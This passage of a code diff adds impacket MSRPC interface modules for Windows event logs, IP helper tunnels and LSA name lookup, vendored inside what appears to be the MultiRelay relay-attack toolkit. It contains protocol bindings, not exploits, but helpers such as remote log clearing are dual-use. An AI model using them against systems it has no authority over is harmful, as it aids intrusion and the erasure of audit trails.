+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.5 ElfrRegisterEventSourceW (Opnum 8)
+class ElfrRegisterEventSourceW(NDRCALL):
+    opnum = 8
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('ModuleName', RPC_UNICODE_STRING),
+       ('RegModuleName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrRegisterEventSourceWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.1 ElfrOpenBELW (Opnum 9)
+class ElfrOpenBELW(NDRCALL):
+    opnum = 9
+    structure = (
+       ('UNCServerName', EVENTLOG_HANDLE_W),
+       ('BackupFileName', RPC_UNICODE_STRING),
+       ('MajorVersion', ULONG),
+       ('MinorVersion', ULONG),
+    )
+
+class ElfrOpenBELWResponse(NDRCALL):
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.7 ElfrReadELW (Opnum 10)
+class ElfrReadELW(NDRCALL):
+    opnum = 10
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('ReadFlags', ULONG),
+       ('RecordOffset', ULONG),
+       ('NumberOfBytesToRead', ULONG),
+    )
+
+class ElfrReadELWResponse(NDRCALL):
+    structure = (
+       ('Buffer', NDRUniConformantArray),
+       ('NumberOfBytesRead', ULONG),
+       ('MinNumberOfBytesNeeded', ULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+# 3.1.4.13 ElfrReportEventW (Opnum 11)
+class ElfrReportEventW(NDRCALL):
+    opnum = 11
+    structure = (
+       ('LogHandle', IELF_HANDLE),
+       ('Time', ULONG),
+       ('EventType', USHORT),
+       ('EventCategory', USHORT),
+       ('EventID', ULONG),
+       ('NumStrings', USHORT),
+       ('DataSize', ULONG),
+       ('ComputerName', RPC_UNICODE_STRING),
+       ('UserSID', PRPC_SID),
+       ('Strings', PRPC_UNICODE_STRING_ARRAY),
+       ('Data', LPBYTE),
+       ('Flags', USHORT),
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+    )
+
+class ElfrReportEventWResponse(NDRCALL):
+    structure = (
+       ('RecordNumber', PULONG),
+       ('TimeWritten', PULONG),
+       ('ErrorCode', NTSTATUS),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (ElfrClearELFW, ElfrClearELFWResponse),
+    1   : (ElfrBackupELFW, ElfrBackupELFWResponse),
+    2   : (ElfrCloseEL, ElfrCloseELResponse),
+    4   : (ElfrNumberOfRecords, ElfrNumberOfRecordsResponse),
+    5   : (ElfrOldestRecord, ElfrOldestRecordResponse),
+    7   : (ElfrOpenELW, ElfrOpenELWResponse),
+    8   : (ElfrRegisterEventSourceW, ElfrRegisterEventSourceWResponse),
+    9   : (ElfrOpenBELW, ElfrOpenBELWResponse),
+    10  : (ElfrReadELW, ElfrReadELWResponse),
+    11  : (ElfrReportEventW, ElfrReportEventWResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def hElfrOpenBELW(dce, backupFileName = NULL):
+    request = ElfrOpenBELW()
+    request['UNCServerName'] = NULL
+    request['BackupFileName'] = backupFileName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrOpenELW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrOpenELW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrCloseEL(dce, logHandle):
+    request = ElfrCloseEL()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrRegisterEventSourceW(dce, moduleName = NULL, regModuleName = NULL):
+    request = ElfrRegisterEventSourceW()
+    request['UNCServerName'] = NULL
+    request['ModuleName'] = moduleName
+    request['RegModuleName'] = regModuleName
+    request['MajorVersion'] = 1
+    request['MinorVersion'] = 1
+    return dce.request(request)
+
+def hElfrReadELW(dce, logHandle = '', readFlags = EVENTLOG_SEEK_READ|EVENTLOG_FORWARDS_READ,
+                 recordOffset = 0, numberOfBytesToRead = MAX_BATCH_BUFF):
+    request = ElfrReadELW()
+    request['LogHandle'] = logHandle
+    request['ReadFlags'] = readFlags
+    request['RecordOffset'] = recordOffset
+    request['NumberOfBytesToRead'] = numberOfBytesToRead
+    return dce.request(request)
+
+def hElfrClearELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrClearELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrBackupELFW(dce, logHandle = '', backupFileName = NULL):
+    request = ElfrBackupELFW()
+    request['LogHandle'] = logHandle
+    request['BackupFileName'] = backupFileName
+    return dce.request(request)
+
+def hElfrNumberOfRecords(dce, logHandle):
+    request = ElfrNumberOfRecords()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp
+
+def hElfrOldestRecordNumber(dce, logHandle):
+    request = ElfrOldestRecord()
+    request['LogHandle'] = logHandle
+    resp = dce.request(request)
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/even6.py

@@ -0,0 +1,344 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+# Copyright (c) 2017 @MrAnde7son
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Itamar (@MrAnde7son)
+#
+# Description:
+#   Initial [MS-EVEN6] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file.
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too.
+#
+from impacket import system_errors
+from impacket.dcerpc.v5.dtypes import WSTR, DWORD, LPWSTR, ULONG, LARGE_INTEGER, WORD, BYTE
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray, NDRUniVaryingArray, NDRSTRUCT
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_EVEN6 = uuidtup_to_bin(('F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__(self):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+            return 'EVEN6 SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EVEN6 SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Evt Path Flags
+EvtQueryChannelName = 0x00000001
+EvtQueryFilePath = 0x00000002
+EvtReadOldestToNewest = 0x00000100
+EvtReadNewestToOldest = 0x00000200
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class CONTEXT_HANDLE_LOG_HANDLE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_HANDLE(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class CONTEXT_HANDLE_LOG_QUERY(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class LPPCONTEXT_HANDLE_LOG_QUERY(NDRPOINTER):
+    referent = (
+        ('Data', PCONTEXT_HANDLE_LOG_QUERY),
+    )
+
+class CONTEXT_HANDLE_OPERATION_CONTROL(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s=""'),
+    )
+
+class PCONTEXT_HANDLE_OPERATION_CONTROL(NDRPOINTER):
+    referent = (
+        ('Data', CONTEXT_HANDLE_OPERATION_CONTROL),
+    )
+
+# 2.2.11 EvtRpcQueryChannelInfo
+class EvtRpcQueryChannelInfo(NDRSTRUCT):
+    structure = (
+        ('Name', LPWSTR),
+        ('Status', DWORD),
+    )
+
+class EvtRpcQueryChannelInfoArray(NDRUniVaryingArray):
+    item = EvtRpcQueryChannelInfo
+
+class LPEvtRpcQueryChannelInfoArray(NDRPOINTER):
+    referent = (
+        ('Data', EvtRpcQueryChannelInfoArray)
+    )
+
+class RPC_INFO(NDRSTRUCT):
+    structure = (
+        ('Error', DWORD),
+        ('SubError', DWORD),
+        ('SubErrorParam', DWORD),
+    )
+
+class PRPC_INFO(NDRPOINTER):
+    referent = (
+        ('Data', RPC_INFO)
+    )
+
+class WSTR_ARRAY(NDRUniVaryingArray):
+    item = WSTR
+
+class DWORD_ARRAY(NDRUniVaryingArray):
+    item = DWORD
+
+class LPDWORD_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', DWORD_ARRAY)
+    )
+
+class BYTE_ARRAY(NDRUniVaryingArray):
+    item = 'c'
+
+class CBYTE_ARRAY(NDRUniVaryingArray):
+    item = BYTE
+
+class CDWORD_ARRAY(NDRUniConformantArray):
+    item = DWORD
+
+class LPBYTE_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', CBYTE_ARRAY)
+    )
+
+class ULONG_ARRAY(NDRUniVaryingArray):
+    item = ULONG
+
+# 2.3.1 EVENT_DESCRIPTOR
+class EVENT_DESCRIPTOR(NDRSTRUCT):
+    structure = (
+        ('Id', WORD),
+        ('Version', BYTE),
+        ('Channel', BYTE),
+        ('LevelSeverity', BYTE),
+        ('Opcode', BYTE),
+        ('Task', WORD),
+        ('Keyword', ULONG),
+    )
+
+class BOOKMARK(NDRSTRUCT):
+    structure = (
+        ('BookmarkSize', DWORD),
+        ('HeaderSize', '<L=0x18'),
+        ('ChannelSize', DWORD),
+        ('CurrentChannel', DWORD),
+        ('ReadDirection', DWORD),
+        ('RecordIdsOffset', DWORD),
+        ('LogRecordNumbers', ULONG_ARRAY),
+    )
+
+
+#2.2.17 RESULT_SET
+class RESULT_SET(NDRSTRUCT):
+    structure = (
+        ('TotalSize', DWORD),
+        ('HeaderSize', DWORD),
+        ('EventOffset', DWORD),
+        ('BookmarkOffset', DWORD),
+        ('BinXmlSize', DWORD),
+        ('EventData', BYTE_ARRAY),
+        #('NumberOfSubqueryIDs', '<L=0'),
+        #('SubqueryIDs', BYTE_ARRAY),
+        #('BookMarkData', BOOKMARK),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+class EvtRpcRegisterLogQuery(NDRCALL):
+    opnum = 5
+    structure = (
+        ('Path', LPWSTR),
+        ('Query', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcRegisterLogQueryResponse(NDRCALL):
+    structure = (
+        ('Handle', CONTEXT_HANDLE_LOG_QUERY),
+        ('OpControl', CONTEXT_HANDLE_OPERATION_CONTROL),
+        ('QueryChannelInfoSize', DWORD),
+        ('QueryChannelInfo', EvtRpcQueryChannelInfoArray),
+        ('Error', RPC_INFO),
+        )
+
+class EvtRpcQueryNext(NDRCALL):
+    opnum = 11
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('NumRequestedRecords', DWORD),
+        ('TimeOutEnd', DWORD),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQueryNextResponse(NDRCALL):
+    structure = (
+        ('NumActualRecords', DWORD),
+        ('EventDataIndices', DWORD_ARRAY),
+        ('EventDataSizes', DWORD_ARRAY),
+        ('ResultBufferSize', DWORD),
+        ('ResultBuffer', BYTE_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcQuerySeek(NDRCALL):
+    opnum = 12
+    structure = (
+        ('LogQuery', CONTEXT_HANDLE_LOG_QUERY),
+        ('Pos', LARGE_INTEGER),
+        ('BookmarkXML', LPWSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcQuerySeekResponse(NDRCALL):
+    structure = (
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcClose(NDRCALL):
+    opnum = 13
+    structure = (
+        ("Handle", CONTEXT_HANDLE_LOG_HANDLE),
+    )
+
+class EvtRpcCloseResponse(NDRCALL):
+    structure = (
+        ("Handle", PCONTEXT_HANDLE_LOG_HANDLE),
+        ('ErrorCode', ULONG),
+    )
+
+class EvtRpcOpenLogHandle(NDRCALL):
+    opnum = 17
+    structure = (
+        ('Channel', WSTR),
+        ('Flags', DWORD),
+    )
+
+class EvtRpcOpenLogHandleResponse(NDRCALL):
+    structure = (
+        ('Handle', PCONTEXT_HANDLE_LOG_HANDLE),
+        ('Error', RPC_INFO),
+    )
+
+class EvtRpcGetChannelList(NDRCALL):
+    opnum = 19
+    structure = (
+        ('Flags', DWORD),
+    )
+
+class EvtRpcGetChannelListResponse(NDRCALL):
+    structure = (
+        ('NumChannelPaths', DWORD),
+        ('ChannelPaths', WSTR_ARRAY),
+        ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+    5   : (EvtRpcRegisterLogQuery, EvtRpcRegisterLogQueryResponse),
+    11  : (EvtRpcQueryNext,  EvtRpcQueryNextResponse),
+    12  : (EvtRpcQuerySeek, EvtRpcQuerySeekResponse),
+    13  : (EvtRpcClose, EvtRpcCloseResponse),
+    17  : (EvtRpcOpenLogHandle, EvtRpcOpenLogHandle),
+    19  : (EvtRpcGetChannelList, EvtRpcGetChannelListResponse),
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+
+def hEvtRpcRegisterLogQuery(dce, path, flags, query='*\x00'):
+    request = EvtRpcRegisterLogQuery()
+
+    request['Path'] = path
+    request['Query'] = query
+    request['Flags'] = flags
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcQueryNext(dce, handle, numRequestedRecords, timeOutEnd=1000):
+    request = EvtRpcQueryNext()
+
+    request['LogQuery'] = handle
+    request['NumRequestedRecords'] = numRequestedRecords
+    request['TimeOutEnd'] = timeOutEnd
+    request['Flags'] = 0
+    status = system_errors.ERROR_MORE_DATA
+    resp = dce.request(request)
+    while status == system_errors.ERROR_MORE_DATA:
+        try:
+            resp = dce.request(request)
+        except DCERPCException as e:
+            if str(e).find('ERROR_NO_MORE_ITEMS') < 0:
+                raise
+            elif str(e).find('ERROR_TIMEOUT') < 0:
+                raise
+            resp = e.get_packet()
+        return resp
+
+def hEvtRpcClose(dce, handle):
+    request = EvtRpcClose()
+    request['Handle'] = handle
+    resp = dce.request(request)
+    return resp
+
+def hEvtRpcOpenLogHandle(dce, channel, flags):
+    request = EvtRpcOpenLogHandle()
+
+    request['Channel'] = channel
+    request['Flags'] = flags
+    return dce.request(request)
+
+def hEvtRpcGetChannelList(dce):
+    request = EvtRpcGetChannelList()
+
+    request['Flags'] = 0
+    resp = dce.request(request)
+    return resp

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/iphlp.py

@@ -0,0 +1,172 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+#  Implementation of iphlpsvc.dll MSRPC calls (Service that offers IPv6 connectivity over an IPv4 network)
+
+from socket import inet_aton
+
+from impacket import uuid
+from impacket import hresult_errors
+from impacket.uuid import uuidtup_to_bin
+from impacket.dcerpc.v5.dtypes import BYTE, ULONG, WSTR, GUID, NULL
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+
+MSRPC_UUID_IPHLP_IP_TRANSITION   = uuidtup_to_bin(('552d076a-cb29-4e44-8b6a-d15e59e2c0af', '1.0'))
+
+# RPC_IF_ALLOW_LOCAL_ONLY
+MSRPC_UUID_IPHLP_TEREDO          = uuidtup_to_bin(('ecbdb051-f208-46b9-8c8b-648d9d3f3944', '1.0'))
+MSRPC_UUID_IPHLP_TEREDO_CONSUMER = uuidtup_to_bin(('1fff8faa-ec23-4e3f-a8ce-4b2f8707e636', '1.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in hresult_errors.ERROR_MESSAGES:
+            error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
+            return 'IPHLP SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'IPHLP SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+
+# Notification types
+NOTIFICATION_ISATAP_CONFIGURATION_CHANGE               = 0
+NOTIFICATION_PROCESS6TO4_CONFIGURATION_CHANGE          = 1
+NOTIFICATION_TEREDO_CONFIGURATION_CHANGE               = 2
+NOTIFICATION_IP_TLS_CONFIGURATION_CHANGE               = 3
+NOTIFICATION_PORT_CONFIGURATION_CHANGE                 = 4
+NOTIFICATION_DNS64_CONFIGURATION_CHANGE                = 5
+NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX = 6
+
+################################################################################
+# STRUCTURES
+################################################################################
+
+class BYTE_ARRAY(NDRUniConformantArray):
+    item = 'c'
+
+################################################################################
+# RPC CALLS
+################################################################################
+
+# Opnum 0
+class IpTransitionProtocolApplyConfigChanges(NDRCALL):
+    opnum = 0
+    structure = (
+       ('NotificationNum', BYTE),
+    )
+
+class IpTransitionProtocolApplyConfigChangesResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 1
+class IpTransitionProtocolApplyConfigChangesEx(NDRCALL):
+    opnum = 1
+    structure = (
+       ('NotificationNum', BYTE),
+       ('DataLength', ULONG),
+       ('Data', BYTE_ARRAY),
+    )
+
+class IpTransitionProtocolApplyConfigChangesExResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 2
+class IpTransitionCreatev6Inv4Tunnel(NDRCALL):
+    opnum = 2
+    structure = (
+       ('LocalAddress', "4s=''"),
+       ('RemoteAddress', "4s=''"),
+       ('InterfaceName', WSTR),
+    )
+
+class IpTransitionCreatev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+# Opnum 3
+class IpTransitionDeletev6Inv4Tunnel(NDRCALL):
+    opnum = 3
+    structure = (
+       ('TunnelGuid', GUID),
+    )
+
+class IpTransitionDeletev6Inv4TunnelResponse(NDRCALL):
+    structure = (
+       ('ErrorCode', ULONG),
+    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+
+OPNUMS = {
+ 0 : (IpTransitionProtocolApplyConfigChanges, IpTransitionProtocolApplyConfigChangesResponse),
+ 1 : (IpTransitionProtocolApplyConfigChangesEx, IpTransitionProtocolApplyConfigChangesExResponse),
+ 2 : (IpTransitionCreatev6Inv4Tunnel, IpTransitionCreatev6Inv4TunnelResponse),
+ 3 : (IpTransitionDeletev6Inv4Tunnel, IpTransitionDeletev6Inv4TunnelResponse)
+}
+
+################################################################################
+# HELPER FUNCTIONS
+################################################################################
+def checkNullString(string):
+    if string == NULL:
+        return string
+
+    if string[-1:] != '\x00':
+        return string + '\x00'
+    else:
+        return string
+
+# For all notifications except EX
+def hIpTransitionProtocolApplyConfigChanges(dce, notification_num):
+    request = IpTransitionProtocolApplyConfigChanges()
+    request['NotificationNum'] = notification_num
+
+    return dce.request(request)
+
+# Only for NOTIFICATION_DA_SITE_MGR_LOCAL_CONFIGURATION_CHANGE_EX
+# No admin required
+def hIpTransitionProtocolApplyConfigChangesEx(dce, notification_num, notification_data):
+    request = IpTransitionProtocolApplyConfigChangesEx()
+    request['NotificationNum'] = notification_num
+    request['DataLength'] = len(notification_data)
+    request['Data'] = notification_data
+
+    return dce.request(request)
+
+# Same as netsh interface ipv6 add v6v4tunnel "Test Tunnel" 192.168.0.1 10.0.0.5
+def hIpTransitionCreatev6Inv4Tunnel(dce, local_address, remote_address, interface_name):
+    request = IpTransitionCreatev6Inv4Tunnel()
+    request['LocalAddress'] = inet_aton(local_address)
+    request['RemoteAddress'] = inet_aton(remote_address)
+
+    request['InterfaceName'] = checkNullString(interface_name)
+    request.fields['InterfaceName'].fields['MaximumCount'] = 256
+
+    return dce.request(request)
+
+def hIpTransitionDeletev6Inv4Tunnel(dce, tunnel_guid):
+    request = IpTransitionDeletev6Inv4Tunnel()
+    request['TunnelGuid'] = uuid.string_to_bin(tunnel_guid)
+
+    return dce.request(request)

tools/MultiRelay/impacket-dev/impacket/dcerpc/v5/lsat.py

@@ -0,0 +1,494 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Author: Alberto Solino (@agsolino)
+#
+# Description:
+#   [MS-LSAT] Interface implementation
+#
+#   Best way to learn how to use these calls is to grab the protocol standard
+#   so you understand what the call does, and then read the test case located
+#   at https://github.com/SecureAuthCorp/impacket/tree/master/tests/SMB_RPC
+#
+#   Some calls have helper functions, which makes it even easier to use.
+#   They are located at the end of this file. 
+#   Helper functions start with "h"<name of the call>.
+#   There are test cases for them too. 
+#
+from impacket import nt_errors
+from impacket.dcerpc.v5.dtypes import ULONG, LONG, PRPC_SID, RPC_UNICODE_STRING, LPWSTR, PRPC_UNICODE_STRING, NTSTATUS, \
+    NULL
+from impacket.dcerpc.v5.enum import Enum
+from impacket.dcerpc.v5.lsad import LSAPR_HANDLE, PLSAPR_TRUST_INFORMATION_ARRAY
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRENUM, NDRPOINTER, NDRUniConformantArray
+from impacket.dcerpc.v5.rpcrt import DCERPCException
+from impacket.dcerpc.v5.samr import SID_NAME_USE
+from impacket.uuid import uuidtup_to_bin
+
+MSRPC_UUID_LSAT  = uuidtup_to_bin(('12345778-1234-ABCD-EF00-0123456789AB','0.0'))
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in nt_errors.ERROR_MESSAGES:
+            error_msg_short = nt_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = nt_errors.ERROR_MESSAGES[key][1] 
+            return 'LSAT SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'LSAT SessionError: unknown error code: 0x%x' % self.error_code
+
+################################################################################
+# CONSTANTS
+################################################################################
+# 2.2.10 ACCESS_MASK
+POLICY_LOOKUP_NAMES             = 0x00000800
+
+################################################################################
+# STRUCTURES
+################################################################################
+# 2.2.12 LSAPR_REFERENCED_DOMAIN_LIST
+class LSAPR_REFERENCED_DOMAIN_LIST(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Domains', PLSAPR_TRUST_INFORMATION_ARRAY),
+        ('MaxEntries', ULONG),
+    )
+
+class PLSAPR_REFERENCED_DOMAIN_LIST(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_REFERENCED_DOMAIN_LIST),
+    )
+
+# 2.2.14 LSA_TRANSLATED_SID
+class LSA_TRANSLATED_SID(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('RelativeId', ULONG),
+        ('DomainIndex', LONG),
+    )
+
+# 2.2.15 LSAPR_TRANSLATED_SIDS
+class LSA_TRANSLATED_SID_ARRAY(NDRUniConformantArray):
+    item = LSA_TRANSLATED_SID
+
+class PLSA_TRANSLATED_SID_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSA_TRANSLATED_SID_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSA_TRANSLATED_SID_ARRAY),
+    )
+
+# 2.2.16 LSAP_LOOKUP_LEVEL
+class LSAP_LOOKUP_LEVEL(NDRENUM):
+    class enumItems(Enum):
+        LsapLookupWksta                = 1
+        LsapLookupPDC                  = 2
+        LsapLookupTDL                  = 3
+        LsapLookupGC                   = 4
+        LsapLookupXForestReferral      = 5
+        LsapLookupXForestResolve       = 6
+        LsapLookupRODCReferralToFullDC = 7
+
+# 2.2.17 LSAPR_SID_INFORMATION
+class LSAPR_SID_INFORMATION(NDRSTRUCT):
+    structure = (
+        ('Sid', PRPC_SID),
+    )
+
+# 2.2.18 LSAPR_SID_ENUM_BUFFER
+class LSAPR_SID_INFORMATION_ARRAY(NDRUniConformantArray):
+    item = LSAPR_SID_INFORMATION
+
+class PLSAPR_SID_INFORMATION_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_SID_INFORMATION_ARRAY),
+    )
+
+class LSAPR_SID_ENUM_BUFFER(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('SidInfo', PLSAPR_SID_INFORMATION_ARRAY),
+    )
+
+# 2.2.19 LSAPR_TRANSLATED_NAME
+class LSAPR_TRANSLATED_NAME(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Name', RPC_UNICODE_STRING),
+        ('DomainIndex', LONG),
+    )
+
+# 2.2.20 LSAPR_TRANSLATED_NAMES
+class LSAPR_TRANSLATED_NAME_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_NAME
+
+class PLSAPR_TRANSLATED_NAME_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_NAME_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_NAMES(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Names', PLSAPR_TRANSLATED_NAME_ARRAY),
+    )
+
+# 2.2.21 LSAPR_TRANSLATED_NAME_EX
+class LSAPR_TRANSLATED_NAME_EX(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Name', RPC_UNICODE_STRING),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.22 LSAPR_TRANSLATED_NAMES_EX
+class LSAPR_TRANSLATED_NAME_EX_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_NAME_EX
+
+class PLSAPR_TRANSLATED_NAME_EX_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_NAME_EX_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_NAMES_EX(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Names', PLSAPR_TRANSLATED_NAME_EX_ARRAY),
+    )
+
+# 2.2.23 LSAPR_TRANSLATED_SID_EX
+class LSAPR_TRANSLATED_SID_EX(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('RelativeId', ULONG),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.24 LSAPR_TRANSLATED_SIDS_EX
+class LSAPR_TRANSLATED_SID_EX_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_SID_EX
+
+class PLSAPR_TRANSLATED_SID_EX_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_SID_EX_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS_EX(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSAPR_TRANSLATED_SID_EX_ARRAY),
+    )
+
+# 2.2.25 LSAPR_TRANSLATED_SID_EX2
+class LSAPR_TRANSLATED_SID_EX2(NDRSTRUCT):
+    structure = (
+        ('Use', SID_NAME_USE),
+        ('Sid', PRPC_SID),
+        ('DomainIndex', LONG),
+        ('Flags', ULONG),
+    )
+
+# 2.2.26 LSAPR_TRANSLATED_SIDS_EX2
+class LSAPR_TRANSLATED_SID_EX2_ARRAY(NDRUniConformantArray):
+    item = LSAPR_TRANSLATED_SID_EX2
+
+class PLSAPR_TRANSLATED_SID_EX2_ARRAY(NDRPOINTER):
+    referent = (
+        ('Data', LSAPR_TRANSLATED_SID_EX2_ARRAY),
+    )
+
+class LSAPR_TRANSLATED_SIDS_EX2(NDRSTRUCT):
+    structure = (
+        ('Entries', ULONG),
+        ('Sids', PLSAPR_TRANSLATED_SID_EX2_ARRAY),
+    )
+
+class RPC_UNICODE_STRING_ARRAY(NDRUniConformantArray):
+    item = RPC_UNICODE_STRING
+
+################################################################################
+# RPC CALLS
+################################################################################
+# 3.1.4.4 LsarGetUserName (Opnum 45)
+class LsarGetUserName(NDRCALL):
+    opnum = 45
+    structure = (
+       ('SystemName', LPWSTR),
